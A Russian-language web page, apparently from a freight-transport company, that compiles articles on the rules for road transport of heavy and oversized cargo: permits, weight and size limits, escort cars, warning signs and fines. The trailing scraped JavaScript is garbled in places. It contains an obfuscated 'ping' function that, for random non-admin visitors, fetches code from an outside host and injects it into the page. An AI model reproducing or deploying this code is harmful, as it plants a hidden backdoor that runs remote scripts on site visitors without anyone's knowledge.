Правила перевозки тяжеловесных и крупногабаритных грузов

Крупногабаритные и тяжеловесные грузы

Федеральным законом Российской Федерации от 8 ноября 2007 г. № 257-ФЗ «Об автомобильных дорогах и о дорожной деятельности в Российской Федерации и о внесении изменений в отдельные законодательные акты Российской Федерации» пользователям автомобильных дорог запрещается осуществлять перевозки по автомобильным дорогам опасных, тяжеловесных и (или) крупногабаритных грузов без специальных разрешений (далее – Федеральный закон).

Статьей 31 указанного Федерального закона установлено требование о необходимости наличия специального разрешения при движении по автомобильным дорогам транспортных средств, осуществляющих перевозки указанной категории грузов.

Деятельность по перевозке тяжеловесных и (или) крупногабаритных грузов по дорогам Российской Федерации регламентирована и другими нормативными актами:

  • Федеральным законом Российской Федерации от 24 июля 1998 года № 127-ФЗ «О государственном контроле за осуществлением международных автомобильных перевозок и об ответственности за нарушение порядка их выполнения»;
  • Федеральным законом Российской Федерации от 8 ноября 2007 года № 259-ФЗ «Устав автомобильного транспорта и городского наземного электрического транспорта» (далее – Устав);
  • Правилами перевозок грузов автомобильным транспортом, утвержденными постановлением Правительства Российской Федерации от 15 апреля 2011 г. № 272;
  • Правилами дорожного движения Российской Федерации, утвержденными постановлением Совета Министров — Правительства Российской Федерации от 23 октября 1993 г. № 1090 (далее – ПДД);
  • Порядком выдачи специального разрешения на движение по автомобильным дорогам транспортного средства, осуществляющего перевозки тяжеловесных и (или) крупногабаритных грузов, утвержденного приказом Министерства транспорта Российской Федерации от 24 июля 2012 г. № 258 (далее – Порядок выдачи специального разрешения);
  • Правилами обеспечения безопасности перевозок пассажиров и грузов автомобильным транспортом и городским наземным электрическим транспортом, утвержденными приказом Министерства транспорта Российской Федерации от 15 января 2014 г. № 7 (далее – Правила обеспечения безопасности перевозок).

Согласно указанным нормативным актам, перевозка по дорогам тяжеловесных и крупногабаритных грузов может осуществляться только на основании специальных разрешений, выдаваемых в установленном порядке.

Согласование маршрута транспортного средства, перевозящего тяжеловесные грузы, осуществляется уполномоченным органом (ФКУ «Росдормониторинг») с владельцами автомобильных дорог, по которым проходит такой маршрут (далее – владельцы автомобильных дорог).

Согласование маршрута транспортного средства, перевозящего крупногабаритные грузы, осуществляется уполномоченным органом с владельцами автомобильных дорог и органами управления Госавтоинспекции. Согласование с Госавтоинспекцией проводится также в случаях, если для движения транспортного средства, осуществляющего перевозки тяжеловесных грузов, требуется: укрепление отдельных участков автомобильных дорог; принятие специальных мер по обустройству автомобильных дорог и пересекающих их сооружений и инженерных коммуникаций в пределах маршрута; изменение организации дорожного движения по маршруту движения транспортного средства, осуществляющего перевозки тяжеловесных и (или) крупногабаритных грузов; введение ограничений в отношении движения других транспортных средств по требованиям обеспечения безопасности дорожного движения.

Специальное разрешение выдается на одну поездку или на несколько поездок (не более десяти) транспортного средства по определенному маршруту с аналогичным грузом, имеющим одинаковую характеристику (наименование, габариты, масса). Специальное разрешение выдается на срок до 3-х месяцев.

Международные автомобильные перевозки опасных, тяжеловесных и (или) крупногабаритных грузов осуществляются в соответствии с Федеральным законом от 24 июля 1998 года № 127-ФЗ «О государственном контроле за осуществлением международных автомобильных перевозок и об ответственности за нарушение порядка их выполнения».

Перевозка крупногабаритных и (или) тяжеловесных грузов возможна в случаях, когда груз не может быть разделен на части без риска его повреждения.

Не допускается движение транспортных средств, перевозящих крупногабаритные грузы, организованными колоннами.

Для обеспечения безопасности при перевозке крупногабаритных и (или) тяжеловесных грузов и информирования других участников дорожного движения о его габаритах, перечисленных в таблице «Обязательные условия использования автомобилей прикрытия» приложения к Правилам обеспечения безопасности перевозок, необходимо использование автомобилей прикрытия.

Во время перевозки крупногабаритных и (или) тяжеловесных грузов запрещается:

  • отклоняться от установленного в специальном разрешении маршрута;
  • превышать указанную в разрешении скорость движения;
  • осуществлять движение во время гололеда, снегопада, а также при метеорологической видимости менее 100 метров;
  • осуществлять движение по обочине дороги, если такой порядок не определен условиями перевозки;
  • останавливаться вне специально обозначенных стоянок, расположенных за пределами проезжей части;
  • продолжать перевозку при возникновении технической неисправности транспортного средства, угрожающей безопасности движения, а также при смещении груза либо ослаблении его крепления.

В случае, если во время движения возникли обстоятельства, требующие изменения маршрута движения, субъект транспортной деятельности обязан получить специальное разрешение по новому маршруту в установленном порядке.

Как перевозят крупногабаритный и тяжеловесный груз автомобильным транспортом?

Содержание

Груз может быть не только крупногабаритным (а значит, требующим низкорамный транспорт), но и тяжеловесным. К таковым относятся спецтехника и промышленное оборудование, готовые металлоконструкции, иногда — и каркасные постройки, трубы больших размеров и многое другое. Все это необходимо перевозить на автомобилях: даже если вы выбрали в качестве основного транспорта судно или грузовой поезд, вам придется обратиться и за автоперевозками.

Что понимают под крупногабаритным и тяжеловесным грузом?

Критерии зависят от того, каким именно транспортом вы пользуетесь. Ниже приведены параметры грузов в случае с автомобильными перевозками.

В отличие от длинномерных грузов, крупногабаритным считается груз, чьи размеры превышают размеры грузовой платформы транспортного средства на:

  • 20 метров по длине;
  • 4 метра по высоте;
  • 2,55 метра по ширине.

При этом вес груза и его нагрузка на оси не должны превышать предельно допустимые показатели. Если груз весит больше, он является и тяжеловесным.

Тяжеловесный груз, согласно законодательству, весит больше максимальных показателей. Осевая нагрузка такого груза превышает от 5,5 до 16 тонн, общий вес (с транспортным средством) — от 18 до 44 тонн. Лимиты зависят:

  • в случае с осевой нагрузкой: от числа колес и осей; расстояния между осями; расчетной нагрузки на дорогу;
  • в случае с весом: от типа автомобиля и числа осей.

Таким образом, одновременно тяжеловесным и крупногабаритным может быть груз, чьи габариты и вес превышают установленные законом нормы.

Правила и особенности перевозки крупногабаритных и тяжеловесных грузов

Крупногабарит перевозят в соответствии со строгим регламентом. Перевозчик обязан проработать и согласовать маршрут, оснастить транспортное средство соответствующими знаками, оформить документы.

Требования к автотранспорту


— Вес груза (груза вместе с прицепом) не должен превышать допустимые нагрузки, установленные заводом-изготовителем транспортного средства.

— Использовать колесные трактора как тягачи при перевозке по федеральным трассам и гусеничные при движении по дорогам запрещено.
Тормозная система автопоезда должна обеспечивать равномерное торможение без эффекта «складывания».

— Тягач должен быть оборудован устройством, с помощью которого можно остановить прицепы при разрыве соединений.

— Стояночный тормоз должен срабатывать на уклоне в 16 процентов.

— Автомобиль оборудуют противооткатными опорами.

— Грузовик оборудуют опознавательными знаками («Тяжеловесный груз», «Автопоезд» и т.д.) и световыми сигналами желтого либо оранжевого цвета.

Требования к перевозчику

— Перевозчик обязан соблюдать правила перевозки, иметь при себе все документы, следить за состоянием транспортного средства.

— Перевозчик не может отклоняться от маршрута, продолжать движение в гололед, при низкой видимости, ехать по обочине и останавливаться в непредусмотренных для этого местах. Он может двигаться по трассам вне населенных пунктов только в дневное время, а в населенных пунктах — в период наименьшей интенсивности движения.

— Перевозчик обязан организовать сопровождение.

Требования к документам

Транспортная компания, которая занимается перевозкой тяжеловесного или крупногабаритного груза, должна получить разрешение на доставку с указанием точного маршрута, типа груза, его основных параметров (габаритов и веса), типа транспортного средства. Заявление на разрешение можно подать в орган, отвечающий за состояние дорожных покрытий. Это может быть как федеральная дорожная служба, так и региональная инстанция.

Если груз незначительно превышает допустимые пределы, перевозчик может получить разрешение на транспортировки в течение определенного периода. В рамках этого периода он имеет право перевозить тяжеловесный и крупногабаритный груз. Если груз намного превышает лимиты, установленные законом, разрешение необходимо оформлять на каждую перевозку.

Ограничения при перевозке крупногабаритных и тяжеловесных грузов

По факту, ограничения продиктованы только:

  • характеристиками и состоянием транспортных средств;
  • типом и состоянием дорожного покрытия;
  • наличием конструкций, которые преграждают путь (трубопроводы, мосты и т.д.);
  • временем суток, интенсивностью движения, погодными условиями.

Часть ограничений описаны выше. В частности, водитель не может двигаться:

  • при тумане, сильном дожде или снегопаде, в гололед;
  • ночью — по трассе за городом, днем — в населенных пунктах;
  • по обочинам и дорогам, не предусмотренным маршрутом.

Перевозчик не может организовать стоянку за пределами специально обустроенных площадок, двигаться без разрешения или с просроченным разрешением, брать груз свыше указанных в документах размеров и веса, а также заниматься перевозкой без машин сопровождения, если они необходимы.

Поделиться в соц сетях:

смотрите также

Полезные материалы

Топливо входит в обширную группу «нефтепродукты» и поставляется в основном на экспорт в другие страны. В этом случае продукция не облагается акцизами. Государству выгодно поставлять товар на продажу. Однако это… подробнее

Товары из Китая пользуются огромной популярностью в России. Если раньше маркировка «Made in China» сигнализировала о дешевой вещи плохого качества, то сегодня ситуация изменилась. Цены остались низкими, а качество стало… подробнее

новости компании

У нас есть возможность везти груз не дожидаясь формирования машины, а сразу под любые контракты мелкими партиями. Операционно можно грузить автобусы Mercedes-Benz Sprinter с прицепом под таможенным контролем. Срок доставки Рига-Москва 2-3 дня в зависимости от очередей на границе. подробнее

Мы переехали в Риге со склада на склад. Новый склад более комфортабельный, с лучшей приемкой и ценами. подробнее

Перевозка крупногабаритных грузов

Начиная изучение правил перевозки тяжеловесных грузов, остановимся на самом определении. Оно позволит понять, о чем пойдет речь далее.

Тяжеловесными называют грузы, масса которых вместе с самим грузовым транспортным средством превышает максимальные показатели разрешенной массы транспорта и допустимые осевые нагрузки. Так можно понять, что степень тяжеловесности определяется с учетом двух показателей:

  • общая масса груженного грузовика;
  • нагрузка, приходящаяся на оси.

Важно! Если вы сами разбираете свой случай, связанный с перевозкой крупногабаритных грузов, то вам следует помнить, что:

  • Все случаи, связанные с перевозкой крупногабаритных грузов, уникальны и индивидуальны.
  • Понимание основ закона полезно, но не гарантирует достижения результата.
  • Возможность положительного исхода зависит от множества факторов.

Чтобы получить максимально подробную консультацию по своему вопросу, вам достаточно выполнить любой из предложенных вариантов:

  • Обратиться за консультацией через форму.
  • Воспользоваться онлайн чатом в нижнем правом углу.
  • Позвонить:
    • ☎ Федеральный номер: 8 (800) 500-27-29 доб. 844

Если хотя бы один из показателей превышает допустимые нормы, объект является тяжеловесным. Для его транспортировки требуется оформление специального разрешения, а также обеспечение дополнительных мер безопасности.

Важно! При таких перевозках их организатор должен заплатить определенную денежную сумму за вред, наносимый дорожному полотну. Ее размер зависит от степени превышения допустимых показателей, типов и протяженности участков автомобильных дорог, по которым проложен маршрут грузовика.

Существующие категории тяжеловесов

Если брать за основу общую массу груза и грузовика, здесь имеют место такие допустимые параметры:

  • для двухосных одиночных грузовых авто – 18 тонн;
  • для трехосных – не больше 25 тонн;
  • для четырехосных – до 32 тонн;
  • если речь идет про тягач с прицепом или полуприцепом, для трехосных автопоездов максимальный показатель составляет 28 тонн. Для четырехосных – 36 тонн, если осей 5 и больше – до 40 тонн.

Если говорить про допустимые показатели нагрузки по осям, тут дела обстоят сложнее. Нужно учитывать разрешенные показатели, действующие по отношению к автодорогам, по которым передвигается грузовой транспорт. Все значения прописаны в специальной таблице, где указан максимально допустимый вес, который может передаваться колесами одиночной оси.

Важно! На практике автоперевозок тяжеловесными считаются объекты, масса которых превышает 23 тонны. Если она меньше, для перевозки может использоваться грузовой транспорт общего назначения.

Каким требованиям должен соответствовать транспорт, перевозящий тяжеловес

Правила перевозки негабаритных и тяжеловесных грузов предполагают использование специальных транспортных средств. От обычных грузовиков они отличаются несколькими важными особенностями:

  • прицепы зачастую имеют низкую раму. Это облегчает процесс погрузки. Рама характеризуется усиленной конструкцией, что снижает вероятность возникновения в пути непредвиденных ситуаций, связанных с поломками;
  • некоторые варианты полуприцепов могут раздвигаться по ширине и длине, что упрощает погрузку и закрепление объекта, повышает безопасность транспортировки;
  • полуприцепы и тягачи предполагают наличие большого количества осей. Это исключает ответственность за перегруз по осям;
  • наличие особых рулевых механизмов на осях, облегчающее маневрирование груженного транспорта;
  • наличие специальных трапов, рассчитанных на заезд самоходной техники, перевозка которой запланирована;
  • тягачи характеризуются повышенной мощностью, оснащены высокопрочными прицепными устройствами;
  • наличие специального дополнительного оборудования и устройств, делающих перевозку более безопасной и удобной.

Перевозка крупногабаритных грузов автомобильным транспортом, не предназначенным для таких целей, выполняться не должна. Это чревато возникновением непредвиденных ситуаций в дороге, представляющих опасность не только для самого груза, авто и его водителя, но и для других участников дорожного движения.

Правила дорожного движения и перевозка негабарита

Перевозка негабаритного и тяжеловесного объекта регламентируется пунктом 23.3 ПДД. Он предполагает необходимость соблюдения таких условий:

  • груз не сказывается на качестве обзора водителя;
  • отсутствует негативное воздействие на устойчивость грузовика на дорожном полотне;
  • все сигналы, светоотражающие и другие опознавательные знаки, световые приборы открыты и работают без помех;
  • нет препятствий для восприятия водителем сигналов, которые подаются рукой;
  • отсутствуют чрезмерные шумы, не наносится вред дорожному полотну и окружающей среде.

Если говорить про штрафы, инспектора ГИБДД могут составить протокол по следующим вариантам нарушений:

  • отсутствуют разрешительные документы или в них есть ошибки, неточности. Водителя могут оштрафовать на 2000-2500 рублей, лишить водительского удостоверения на 4-6 месяцев. Для должностных лиц применяются более суровые меры;
  • габариты груза превышают указанные в разрешительных документах цифры на 10 и более см. Штраф 1500-2000 рублей, лишение права управления на 2-4 месяца;
  • масса груза или нагрузка на ось превышает допустимые параметры на 15 и более процентов. Штраф 1500-2000 рублей. Повысится взыскание, если имели место дополнительные нарушения, например, пересечение сплошной без обгона;
  • нарушение других правил транспортировки тяжеловесных грузов. Штраф 1000-1500 рублей.

Штрафуются и должностные, юридические лица. Для них штрафы составляют десятки и сотни тысяч рублей. Поэтому, чтобы избежать неприятностей, к организации перевозки крупногабаритного и тяжеловесного груза необходимо подойти с максимальной ответственностью.

Правила перевозки негабаритных и тяжеловесных грузов

Если у Вас наметился переезд, то вслед за ними возник и один из самых популярных вопросов – как перевезти тяжелые негабаритные грузы? Перед размещением запроса на перевозку мы рекомендуем ознакомиться с этой небольшой статьей-советом.

Советы по перевозке негабаритных грузов

При транспортировке грузов часто возникает ситуация, когда необходимо перевезти не просто кухонный гарнитур, а нечто более масштабное. Что делать в такой ситуации? Как перевозить негабаритный груз?

Существуют закрепленные законом правила, касающиеся негабаритных грузов. Основные требования регламентируются ПДД и постановлениями. Кратко их суть и изменения правил перевозки негабаритных грузов 2015 будут изложены ниже.

Что представляет из себя негабаритный груз?

Согласно правилам 2015 года, негабаритным считается тот груз, который нарушает какое-либо из ниже указанных условий:

  • Ширина груза > 2,5 м;
  • Длина > 13,6 м;
  • Высота > 2,5 м
  • Нагрузка на оси, масса груза не соответствуют техническим требованиям автомобиля.

Если перевозимый груз выходит за пределы автомобиля хотя бы на 0,4 метра (ширина) и 1 м (длина), то требуется обязательное размещение специального светоотражающего знака.

Перевозка негабаритных грузов на грузовом автомобиле

Для перевозки крупногабаритного груза нужно получить разрешение, которое оформляется в ГИБДД на срок до 3-х месяцев. Что дает этот документ? Право производить единоразовую или многоразовую (не более 10 раз) перевозку по указанному маршруту. Запрещается уклоняться от намеченного заранее пути, что связано с грузоподъемностью дорожных сооружений на маршруте следования.

Существует также ряд других ограничений, распространяемых на:

  • Превышение допустимой скорости (указана в разрешении);
  • Движение при недостаточной видимости и плохих погодных условиях;
  • Остановку вне стояночных мест;
  • Передвижение по обочине;
  • Перевозку со смещением груза с первоначального крепления или неисправности в самом креплении.

Разрешение получается в том населенном пункте, откуда вы начинаете маршрут грузоперевозки. В заявлении необходимо указать полный маршрут, размеры груза и нагрузку по осям автомобиля.

Провоз тяжеловесного груза без разрешения чреват получением штрафа (2000-2500 для физических лиц, 400-500 тыс. для юридических) и лишением удостоверения на 4-6 месяцев.

Перевозка с сопровождением

Иногда для перевозки негабаритного груза может потребоваться сопровождение машины с проблесковым маячком. Это актуально в том случае, если автомобиль или груз превышает предел в 4 м по ширине или 24 м по длине. Сопровождающая машина должна двигаться с опережением в 10-20 метров и не закрывать угол обзора встречным автомобилям.

Машина Инспекции сопровождает в обязательном порядке грузы от 4 м в ширину и 20 в длину, а также те транспортные средства, которые пусть даже частично занимают встречную полосу.

Перевозка негабаритных грузов – крайне опасный процесс, который требует тщательной подготовки и соблюдения всех установленных правил. Безопаснее обратиться к грамотным перевозчикам с многолетним опытом аналогичных грузоперевозок.

На главной странице «Везёт Всем» вы можете бесплатно рассчитать стоимость планируемой перевозки.Оставьте заявку с габаритами груза и указанием маршрута и сравните тарифы.

Мы подберем перевозчика, который бережно и аккуратно поможет перевезти Ваши тяжеловесные грузы

Если хотите получить максимальную экономию, разместите заказ и уточните у перевозчиков, можно ли перевезти ваши вещи как попутный груз.

Вам также может быть интересно:

Сохрани у себя на стене!

Мы подберем перевозчика, который бережно и аккуратно поможет перевезти Ваши тяжеловесные грузы

Правила перевозки негабаритных грузов

Организация любого вида внутрироссийских или международных перевозок невозможна без указания физических параметров груза. Это прежде всего необходимо для подбора оптимального способа транспортировки и планирования погрузочно-разгрузочных работ. Также груз должен быть взвешен и обмерян не только до того, как будет упакован (если требуется упаковка), но и после этого, вместе с упаковкой. Главным органом, регламентирующим правила транспортировки крупногабаритных и тяжеловесных грузов, является Федеральное дорожное агентство «Росавтодор».

Принципы классификации

Крупногабаритным является любой объект, чьи размеры превышают установленные границы хотя бы по одному из определенных параметров:

  • высоте: 4 м вместе с высотой автомобиля;
  • ширине: не более 2,6 м – для изотермических кузовов, не более 2,55 м – для всех видов транспортных средств;
  • длине: 12 м – одиночные транспортные средства и прицепы, 20 м – автопоезд. Также необходимо учитывать длину свеса груза с транспорта (не более 2 метров);
  • весу. Для каждого транспортного средства это значение носит индивидуальный характер. Оно зависит от грузоподъемности транспорта, а также от предельной осевой нагрузки.

При превышении установленных параметров необходимо получать специальное разрешение на перевозку данного типа грузов.

Правила оформления крупногабаритной грузоперевозки

Для получения разрешения отправитель должен предоставить пакет следующих документов:

  • заявление, включающее описание груза, маршрут и ожидаемую продолжительность перевозки, параметры транспортного средства с указанием его регистрационного номера, марки и модели, предельной грузоподъемности, габаритов и других данных;
  • копии ПТС или свидетельства о регистрации;
  • схематическое изображение транспортного средства с расположением осей, колес и предполагаемым способом крепления груза;
  • данные о технических требованиях к перевозимому объекту.

Разрешение на перевозку негабаритных грузов выдается в зависимости от маршрута транспортировки.

  • При перевозке по дорогам федерального значения на территории более чем двух субъектов РФ разрешение выдает Росавтодор.
  • При транспортировке внутри субъекта по территории двух и более районов – региональные органы исполнительной власти.
  • При перевозке в рамках одного района между двумя населенными пунктами – муниципальные органы исполнительной власти.
  • При транспортировке по территории одного населенного пункта – городская администрация.
  • При перевозке по частной автомобильной дороге – владелец данной дороги.

После подачи заявления необходимо дождаться разрешения от соответствующих органов местного самоуправления, оплатить счет, возмещающий причиненный вред и после предъявления квитанции об оплате начинать транспортировку. В частности, разрешение от Росавтодора выдается максимум за 11 рабочих дней. Оно может быть как одноразовым, так и многоразовым, позволяющим совершать несколько однотипных перевозок по данному маршруту (обычно не более десяти). Впрочем, иногда срок выдачи разрешения на транспортировку может увеличиться в зависимости от различных дополнительных факторов.

Исключения при получении разрешения на транспортировку

В некоторых случаях органы исполнительной власти могут разрешить перевозку груза без необходимости подачи заявления. В том случае, если размеры перевозимого объекта превышают установленные нормы на 2 %, подача заявления не требуется. Если размеры превышают установленные правилами на 2 %, но меньше чем на 10 %, то рассмотрение заявки производится в упрощенном порядке. Наконец, разрешение на перевозку крупногабаритных и тяжеловесных грузов автомобильным транспортом выдается в том случае, если перевозимый объект невозможно разобрать на отдельные части. Исключением является только превышение суммарной массы или предельных размеров на стандартные 2 %.

Осуществление грузоперевозки

Транспортировка крупногабаритного или тяжелого груза предусматривает составление особого маршрута, учитывающего все неудобства, которые будут возникать при перевозке. В частности, перевозка объектов, превышающих предельно допустимые размеры по высоте, должна производиться по дорогам, на которых не встречается туннелей, не требуется проезд под мостом или железнодорожным переездом. Также при невозможности избежать на пути следования линий электропередач нужно предусмотреть привлечение специальной техники для перемещения груза или постройку временных путей объезда. В отдельном порядке стоит позаботиться о дополнительном сопровождении.

Сопровождение груза. Сопровождать перевозку необходимо для предупреждения участников транспортного потока, следующего навстречу грузовому автотранспорту, замера расстояния до ЛЭП и решения других задач. Сопровождать перевозку необходимо, если:

  • суммарная высота транспортного средства с грузом превышает 4,5 м;
  • ширина перевозимого объекта более 3,5 м;
  • длина груза свыше 25 м.

Сопровождение может быть представлено в виде автомобиля сопровождения или автомобиля прикрытия. Он может двигаться перед грузовой фурой (высокий груз) или позади нее (длинномерный груз). Таким образом решается задача об обеспечении самой транспортировки и обеспечении безопасности других участников движения. Автомобиль прикрытия должен иметь отличительные знаки:

  • светоотражающие полосы желто-оранжевого цвета;
  • проблесковые маячки в аналогичной цветовой гамме, монтируемые на крыше;
  • информационное табло (светоотражающее или световое), имеющее надписи «Большая длина» или «Большая ширина».

Автомобилем сопровождения обычно выступает машина ГИБДД, движущаяся перед грузовым транспортным средством, частично занимая встречную полосу на участках с оживленным движением, дополнительно регулируя транспортный поток.

Правила безопасности крупногабаритных перевозок

Грузовой автомобиль, осуществляющий перевозку, также должен быть дополнительно обозначен в потоке отличительными светоотражающими знаками.

Знак «Крупногабаритный груз». Представляет собой металлический или пластиковый квадратный щит размером 40 х 40 см с диагональными красно-белыми полосами. Размещается на бампере грузового автомобиля. Существуют также дополнительные наклейки, выполненные в тех же размерах и цветовой гамме, которые рекомендуется размещать по бокам транспортного средства. Устанавливается, если груз выступает по ширине на 0,4 м или по длине – на 1 м.

Знак «Длинномерное транспортное средство». Прямоугольник размером 120 х 20 см желтого цвета, окаймленный красной полосой. Устанавливается сзади транспортного средства, имеющего длину более 20 м. Допускается использование двух знаков размером 60 х 20 см при невозможности размещения одного большого.

Знак «Автопоезд». Представляет собой три фонаря оранжевого цвета, которые располагаются на крыше транспортного средства, имеющего дополнительный прицеп или несколько прицепов.

Помимо этого, грузовой автомобиль должен соблюдать установленный скоростной режим. Скорость передвижения определяется при выдаче разрешения на перевозку и формировании маршрута. Эта величина учитывает тип груза, погодные условия, особенности дорожного покрытия и местности. При транспортировке с машиной сопровождения лимит скорости обычно устанавливается на отметке не выше 50 км/ч, при перемещении по искусственным сооружениям или под ними – не выше 15 км/ч. Наконец, существует еще несколько правил безопасности, которые перевозчик должен неукоснительно соблюдать:

  • не отходить от установленного маршрута;
  • не совершать внезапные незапланированные остановки;
  • не передвигаться в условиях плохой видимости и неблагоприятных погодных условиях;
  • не производить перевозку при возникновении технических неисправностей транспортного средства.

При необходимости смены маршрута по различным причинам необходимо получить на это дополнительное разрешение. В ином случае предусмотрены определенные штрафные санкции. Кроме того, в процессе транспортировки возможно внеплановое дополнительное измерение параметров груза. В случае если перевозчик занижает показатели при подаче заявления на разрешение перевозки, дополнительный контроль выявит данные нарушения и предъявит серьезные штрафные санкции.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o<300||e.each(function(){var t=ff(this),e=o,a=t.data("top");t.wrap('
');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t<300||ff(".flatPM_sticky_wrapper.flatPM_sidebar_block").css("height",t)},4e3)}),"undefined"!=typeof flat_pm_video&&flatPM_video(flat_pm_video),0 *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()}/zen.yandex/.test(flatPM_getAllUrlParams().utm_referrer)&&(flatPM_setCookie("flat_r_mb","zen.yandex"),flat_userVars.referer="zen.yandex");var parseHTML=function(){var o=/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:]+)[^>]*)\/>/gi,d=/<([\w:]+)/,i=/<|?\w+;/,c={option:[1,""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,l,n=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=n.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(o,"<$1>$2>")+r[2],l=r[0];l--;)a=a.lastChild;for(n.removeChild(n.firstChild);a.firstChild;)n.appendChild(a.firstChild)}else n.appendChild(t.createTextNode(e));return n}}();function flatPM_ping(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"ng"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})}function flatPM_setSCRIPT(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var n=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,l='
'+a+" через "+o+'
'+r+'
',i=e.once;n(t).each(function(){var e=n(this);e.wrap('
